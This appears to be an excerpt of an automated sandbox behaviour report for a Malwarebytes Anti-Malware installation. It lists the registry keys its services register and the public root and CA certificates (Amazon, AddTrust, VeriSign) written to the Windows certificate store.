Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MB.ScanController\CurVer\ = "MB.ScanController.1" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E149FEF9-F1DC-4894-8A8E-AA53F6807EFD} C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B44D50B8-E459-4078-9249-3763459B2676}\TypeLib\ = "{332AFEBA-9341-4CEC-8EA6-DB155A99DF63}" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{616E9BE3-358B-4C06-8AAB-0ACF8D089931}\ProxyStubClsid32 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C74190B4-8589-11D1-B16A-00C0F0283628}\TypeLib\Version = "2.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{278637DA-FDFB-45C7-8CD8-F2D8A9199AB0}\TypeLib\ = "{A23C190D-C714-42C7-BDBB-F4E1DE65AF27}" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{748A86D4-7EDF-41EF-A1EF-9582643B1C9F}\TypeLib\Version = "1.0" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{71B13605-3569-4F4A-B971-08FF179A3A60} C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{373FF7F0-EB8B-11CD-8820-08002B2F4F5A}\Version\ = "1.3" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MB.LogController\CurVer\ = "MB.LogController.1" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{090D2E82-C71B-414E-AF6A-6681A92FF2B3} C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DB82CDC6-F12A-4156-8DBF-EC7465B9C0B9} C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8640989C-20B4-41BE-BFE1-218EF5B076A6}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9ED94440-E5E8-101B-B9B5-444553540000}\Implemented Categories\{0DE86A52-2BAA-11CF-A229-00AA003D7352} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2C247F26-8591-11D1-B16A-00C0F0283628}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD9DA666-8594-11D1-B16A-00C0F0283628}\MiscStatus C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0468FE5A-FFDA-4F57-83F5-79116160E9B8}\TypeLib\Version = "1.0" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2C247F26-8591-11D1-B16A-00C0F0283628}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5F128CCB-D86F-4998-803A-7CD58474FE2C}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0DB6AD16-564C-451A-A173-0F31A62B7A4D}\ProxyStubClsid32 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{D8258E71-3A7A-4D9D-85BB-C7999F95B7E4} C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{612A8624-0FB3-11CE-8747-524153480004} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0713E8D0-850A-101B-AFC0-4210102A8DA7}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C27CCE3B-8596-11D1-B16A-00C0F0283628}\ = "Progress Bar General Property Page Object" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{66833FED-8583-11D1-B16A-00C0F0283628}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B38EDC4F-A2CD-4F76-8607-F123FE4031D5}\TypeLib\Version = "1.0" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{76AD4430-9C5C-4FC2-A15F-4E16ACD735AC} C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F08DF954-8592-11D1-B16A-00C0F0283628}\VersionIndependentProgID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A5091804-600E-4226-BF28-80ABFDF4AFAB}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{01222402-A8AB-4183-8843-8ADBF0B11869}\TypeLib\Version = "1.0" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B860FC17-5606-4F3A-8AE5-E1C139D8BDE3}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0713E8D8-850A-101B-AFC0-4210102A8DA7}\InprocServer32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{89AE2EF4-3346-47C7-9DCF-ED3264527FDE} C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C0CEAFA7-4F65-418C-8A61-92B2048115EE}\ = "ICloudControllerV3" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{983849D5-BFE9-43E9-A9A0-CBAFBC917F39}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{956AEAEB-8EA2-4BE1-AAD0-3BE4C986A1CC}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D7A05281-DB9E-4E02-9680-E4D83CDAA6AB}\TypeLib C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{6B7E6392-850A-101B-AFC0-4210102A8DA7}\1.3\FLAGS\ = "2" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{373FF7F1-EB8B-11CD-8820-08002B2F4F5A}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DE6A4256-97CD-4DBB-9D4A-3054B0BB0F8B}\ProxyStubClsid32 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00A73BC0-754E-44E1-B190-D59E187A5EA1}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A0101B90-FD0B-40CF-90E4-33650F09A80F}\TypeLib\ = "{A82129F1-32E1-4D79-A39F-EBFEE53A70BF}" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2FB37514-21FA-4B2C-94DA-1562126E9F5F} C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9B1790AB-65B0-4F50-812F-7CC86FA94AF7}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7196E77C-8EA5-4824-92C9-BAE8671149FA}\TypeLib C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{8F1C46F8-E697-4175-B240-CDE682A4BA2D}\LocalServer32 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{10DAE713-FD88-4ADB-9406-04CB574D543C} C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E149FEF9-F1DC-4894-8A8E-AA53F6807EFD}\TypeLib\Version = "1.0" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A993F934-6341-4D52-AB17-F93184A624E4}\ProxyStubClsid32 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{99E6F3FE-333C-462C-8C39-BC27DCA4A80E}\ProxyStubClsid32 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E230930A-6CC2-4B9D-8CE1-03F86A8EDA05}\ = "IScanControllerV10" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FB81F893-5D01-4DFD-98E1-3A6CB9C3E63E}\TypeLib\Version = "1.0" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2E3F70EF-D9BE-485F-A6F5-816DD0EDC757}\ProxyStubClsid32 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{929A5C6C-42D7-4248-9533-03C32165691F}\TypeLib\ = "{59DBD1B8-A7BD-4322-998F-41B0D2516FA0}" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BDD1F053-858B-11D1-B16A-00C0F0283628}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{59E42E77-5F19-4602-A559-3FFA9EE51202}\TypeLib C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2A153977-1A37-4EF7-9226-9E128FA51AE1}\ = "ITelemetryControllerV5" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7791BA52-E020-11CF-8E74-00A0C90F26F8} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F4D83604-895E-11D0-B0A6-000000000000} C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\0D44DD8C3C8C1A1A58756481E90F2E2AFFB3D26E\Blob = 0300000001000000140000000d44dd8c3c8c1a1a58756481e90f2e2affb3d26e2000000001000000ba010000308201b63082015ba0030201020213066c9fd5749736663f3b0b9ad9e89e7603f24a300a06082a8648ce3d0403023039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f742043412033301e170d3135303532363030303030305a170d3430303532363030303030305a3039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f7420434120333059301306072a8648ce3d020106082a8648ce3d030107034200042997a7c6417fc00d9be8011b56c6f252a5ba2db212e8d22ed7fac9c5d8aa6d1f73813b3b986b397c33a5c54e868e8017686245577d44581db337e56708eb66dea3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414abb6dbd7069e37ac3086079170c79cc419b178c0300a06082a8648ce3d0403020349003046022100e08592a317b78df92b06a593ac1a98686172fae1a1d0fb1c7860a64399c5b8c40221009c02eff1949cb396f9ebc62af8b62cfe3a901416d78c6324481cdf307dd5683b C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = 19000000010000001000000045ed9bbc5e43d3b9ecd63c060db78e5c03000000010000001400000002faf3e291435468607857694df5e45b6885186868000000010000000800000000409120d035d9017e0000000100000008000000000063f58926d7011d000000010000001000000006f9583c00a763c23fb9e065a3366d55140000000100000014000000adbd987a34b426f7fac42654ef03bde024cb541a620000000100000020000000687fa451382278fff0c8b11f8d43d576671c6eb2bceab413fb83d965d06d2ff20b00000001000000260000005300650063007400690067006f0020002800410064006400540072007500730074002900000053000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000001400000009b9105c5bba24343ca7f341c624e183f6ee7c1b20000000010000003a040000308204363082031ea003020102020101300d06092a864886f70d0101050500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3030303533303130343833385a170d3230303533303130343833385a306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100b7f71a33e6f200042d39e04e5bed1fbc6c0fcdb5fa23b6cede9b113397a4294c7d939fbd4abc93ed031ae38fcfe56d505ad69729945a80b0497adb2e95fdb8cabf37382d1e3e9141ad7056c7f04f3fe8329e74cac89054e9c65f0f789d9a403c0eac61aa5e148f9e87a16a50dcd79a4eaf05b3a671949c71b350600ac7139d38078602a8e9a869261890ab4cb04f23ab3a4f84d8dfce9fe1696fbbd742d76b44e4c7adee6d415f725a710837b37965a459a09437f7002f0dc29272dad03872db14a845c45d2a7db7b4d6c4eeaccd1344b7c92bdd430025fa61b9696a582311b7a7338f567559f5cd29d746b70a2b65b6d3426f15b2b87bfbefe95d53d5345a270203010001a381dc3081d9301d0603551d0e04160414adbd987a34b426f7fac42654ef03bde024cb541a300b0603551d0f040403020106300f0603551d130101ff040530030101ff3081990603551d2304819130818e8014adbd987a34b426f7fac42654ef03bde024cb541aa173a471306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74820101300d06092a864886f70d01010505000382010100b09be08525c2d623e20f9606929d41989cd9847981d91e5b14072336658fb0d877bbac416c47608351b0f9323de7fcf62613c78016a5bf5afc87cf787989219ae24c070a8635bcf2de51c4d296b7dc7e4eee70fd1c39eb0c0251142d8ebd16e0c1df4675e724adecf442b48593701067ba9d06354a18d32b7acc5142a17a63d1e6bba1c52bc236be130de6bd637e797ba7090d40ab6add8f8ac3f6f68c1a420551d445f59fa76221681520433c99e77cbd24d8a9911773883f561b313818b4710f9acdc80e9e8e2e1be18c9883cb1f31f1444cc604734976600fc7f8bd17806b2ee9cc4c0e5a9a790f200a2ed59e63261e559294d882175a7bd0bcc78f4e8604 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\B51C067CEE2B0C3DF855AB2D92F4FE39D4E70F0E C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\8DA7F965EC5EFC37910F1C6E59FDC1CC6A6EDE16 C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F6108407D6F8BB67980CC2E244C2EBAE1CEF63BE C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\1C58A3A8518E8759BF075B76B750D4F2DF264FCD C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\24A40A1F573643A67F0A4B0749F6A22BF28ABB6B C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\24A40A1F573643A67F0A4B0749F6A22BF28ABB6B\Blob = 040000000100000010000000dd753f56bfbbc5a17a1553c690f9fbcc03000000010000001400000024a40a1f573643a67f0a4b0749f6a22bf28abb6b680000000100000008000000000036044ddfd3017e0000000100000008000000000010c51e92d2011d0000000100000010000000177f789e96523e206c796917c848d50f0b000000010000001200000056006500720069005300690067006e000000140000000100000014000000902f82a37c4797011e0f4ba5af1313c2111347ea090000000100000016000000301406082b0601050507030306082b06010505070304620000000100000020000000ac1fae74b4e97106092131f2e7f746b6734386742bdfd8423731aed14a4ce4460f0000000100000010000000a2011111cc748d961c35c67a0d5c8af520000000010000004402000030820240308201a9021003c78f37db9228df3cbb1aad82fa6710300d06092a864886f70d010102050030613111300f06035504071308496e7465726e657431173015060355040a130e566572695369676e2c20496e632e31333031060355040b132a566572695369676e20436f6d6d65726369616c20536f667477617265205075626c697368657273204341301e170d3936303430393030303030305a170d3034303130373233353935395a30613111300f06035504071308496e7465726e657431173015060355040a130e566572695369676e2c20496e632e31333031060355040b132a566572695369676e20436f6d6d65726369616c20536f667477617265205075626c69736865727320434130819f300d06092a864886f70d010101050003818d0030818902818100c3d3696552019454ab28c66218b35455c54487454a3bc27ed8d3d7c880868dd80cf1169ccc6ba929b28f767392c8c562a63ced1e0575f013006c144dd4989007be697381b8624e311ed1fcc90ceb7d90bfaeb44751ec6fce643502d67d670577e28fd951d7fb9719bc3ed77781c643ddf2dddfcaa3838bcb41c13d224848a6190203010001300d06092a864886f70d010102050003818100b5bcb0756a89a286bd6478c3a732757211aa26021760304ce3483419b9524a511880fe532d7bd5318cc5659941412ff2ae637ae8739915901a1f7a8b41d08e3ad0cd383444d075f8ea71c481193817354aaec53e32e621b805c093e1c7385cd8f793386490ed54cecad3d3d05fef049bde0282dd8829b1c34fa5cd7164313c3c C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = 0400000001000000100000001d3554048578b03f42424dbf20730a3f0f000000010000001400000009b9105c5bba24343ca7f341c624e183f6ee7c1b090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b00000001000000260000005300650063007400690067006f00200028004100640064005400720075007300740029000000620000000100000020000000687fa451382278fff0c8b11f8d43d576671c6eb2bceab413fb83d965d06d2ff2140000000100000014000000adbd987a34b426f7fac42654ef03bde024cb541a1d000000010000001000000006f9583c00a763c23fb9e065a3366d557e0000000100000008000000000063f58926d70168000000010000000800000000409120d035d90103000000010000001400000002faf3e291435468607857694df5e45b6885186819000000010000001000000045ed9bbc5e43d3b9ecd63c060db78e5c20000000010000003a040000308204363082031ea003020102020101300d06092a864886f70d0101050500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3030303533303130343833385a170d3230303533303130343833385a306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100b7f71a33e6f200042d39e04e5bed1fbc6c0fcdb5fa23b6cede9b113397a4294c7d939fbd4abc93ed031ae38fcfe56d505ad69729945a80b0497adb2e95fdb8cabf37382d1e3e9141ad7056c7f04f3fe8329e74cac89054e9c65f0f789d9a403c0eac61aa5e148f9e87a16a50dcd79a4eaf05b3a671949c71b350600ac7139d38078602a8e9a869261890ab4cb04f23ab3a4f84d8dfce9fe1696fbbd742d76b44e4c7adee6d415f725a710837b37965a459a09437f7002f0dc29272dad03872db14a845c45d2a7db7b4d6c4eeaccd1344b7c92bdd430025fa61b9696a582311b7a7338f567559f5cd29d746b70a2b65b6d3426f15b2b87bfbefe95d53d5345a270203010001a381dc3081d9301d0603551d0e04160414adbd987a34b426f7fac42654ef03bde024cb541a300b0603551d0f040403020106300f0603551d130101ff040530030101ff3081990603551d2304819130818e8014adbd987a34b426f7fac42654ef03bde024cb541aa173a471306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74820101300d06092a864886f70d01010505000382010100b09be08525c2d623e20f9606929d41989cd9847981d91e5b14072336658fb0d877bbac416c47608351b0f9323de7fcf62613c78016a5bf5afc87cf787989219ae24c070a8635bcf2de51c4d296b7dc7e4eee70fd1c39eb0c0251142d8ebd16e0c1df4675e724adecf442b48593701067ba9d06354a18d32b7acc5142a17a63d1e6bba1c52bc236be130de6bd637e797ba7090d40ab6add8f8ac3f6f68c1a420551d445f59fa76221681520433c99e77cbd24d8a9911773883f561b313818b4710f9acdc80e9e8e2e1be18c9883cb1f31f1444cc604734976600fc7f8bd17806b2ee9cc4c0e5a9a790f200a2ed59e63261e559294d882175a7bd0bcc78f4e8604 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F6108407D6F8BB67980CC2E244C2EBAE1CEF63BE\Blob = 030000000100000014000000f6108407d6f8bb67980cc2e244c2ebae1cef63be2000000001000000f6010000308201f230820178a0030201020213066c9fd7c1bb104c2943e5717b7b2cc81ac10e300a06082a8648ce3d0403033039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f742043412034301e170d3135303532363030303030305a170d3430303532363030303030305a3039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f7420434120343076301006072a8648ce3d020106052b8104002203620004d2ab8a374fa3530dfec18a7b4ba87b464b63b062f62d1bdb087121d200e863bd9a27fbf0396e5dea3da5c981aaa35b2098455d16dbfde8106de39ce0e3bd5f8462f3706433a0cb242f70ba88a12aa075f881ae6206c481db396e29b01efa2e5ca3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414d3ecc73a656ecce1da769a56fb9cf3866d57e581300a06082a8648ce3d040303036800306502303a8b21f1bd7e11add0ef58962fd6eb9d7e908d2bcf6655c32ce328a9700a470ef0375912ff2d9994284e2a4f354d335a023100ea75004e3bc43a941291c958469d211372a7889c8ae44c4adb96d4ac8b6b6b49125333add7e4be24fcb50a76d4a5bc10 C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\2AD974A775F73CBDBBD8F5AC3A49255FA8FB1F8C\Blob = 0300000001000000140000002ad974a775f73cbdbbd8f5ac3a49255fa8fb1f8c2000000001000000620400003082045e30820346a0030201020213077312380b9d6688a33b1ed9bf9ccda68e0e0f300d06092a864886f70d01010b05003039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f742043412031301e170d3232303832333232323132385a170d3330303832333232323132385a303c310b3009060355040613025553310f300d060355040a1306416d617a6f6e311c301a06035504031313416d617a6f6e205253412032303438204d303130820122300d06092a864886f70d01010105000382010f003082010a0282010100eb712ca9cb1f8828923230af8a570f78b73725955587ac675c97d322c8daa214676b7cf067dae2032ab356125dc6b547f96708a7937a9592180fb4f9f910369a7f2f80b64fba134ec75d531ee0dd96330720d396bc12e4745042a1051373b54f9b4424fe2d7fedbc2285ec362133977506ce271882dce3d9c582078d5e26012626671fd93f13cf32ba6bad7864fcaaff0e023c07df9c0578728cfdea75b7032884dae86e078cd05085ef8154b2716eec6d62ef8f94c35ee9c4a4d091c02e249198caeeba258ed4f671b6fb5b6b38064837478d86dcf2ea06fb76377d9eff424e4d588293cfe271c278b17aab4b5b94378881e4d9af24aef872c565fb4bb451e70203010001a382015a3082015630120603551d130101ff040830060101ff020100300e0603551d0f0101ff040403020186301d0603551d250416301406082b0601050507030106082b06010505070302301d0603551d0e0416041481b80e638a891218e5fa3b3b50959fe6e5901385301f0603551d230418301680148418cc8534ecbc0c94942e08599cc7b2104e0a08307b06082b06010505070101046f306d302f06082b060105050730018623687474703a2f2f6f6373702e726f6f746361312e616d617a6f6e74727573742e636f6d303a06082b06010505073002862e687474703a2f2f6372742e726f6f746361312e616d617a6f6e74727573742e636f6d2f726f6f746361312e636572303f0603551d1f043830363034a032a030862e687474703a2f2f63726c2e726f6f746361312e616d617a6f6e74727573742e636f6d2f726f6f746361312e63726c30130603551d20040c300a3008060667810c010201300d06092a864886f70d01010b05000382010100ad00de0205232e063262b46bb19416e41140de2bfa59c135efe0aa8f2b41b9d1f38739001df23db5a7470c0606c691f3075702d4edbd17c1909abf4875a2074f30dd4a6a42b50d3d15c00ffe845bc63c99cc5752b1d86e12d59692934b94e507e88982086a7a34d49e64e13d876a92909a63a14bf88fb6ea34d305be20c2de06e28c9f738b9f4d3985cace19369d85c99ec9f8503fb67e88a1efca84068b50b40a5ca61c44f1fdc8614060f26125aa07f4c7c27375e40c0b428d04e55f4448995b7b898196a7889d4b0d62e804c4d7feb4e8b26dcaecc01cbc385b1ddf85ce5b7ae3494b6cb9a7ddf405b249ade1c5146bc2ccebcd7fd65869bac3207e7fb0b8 C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
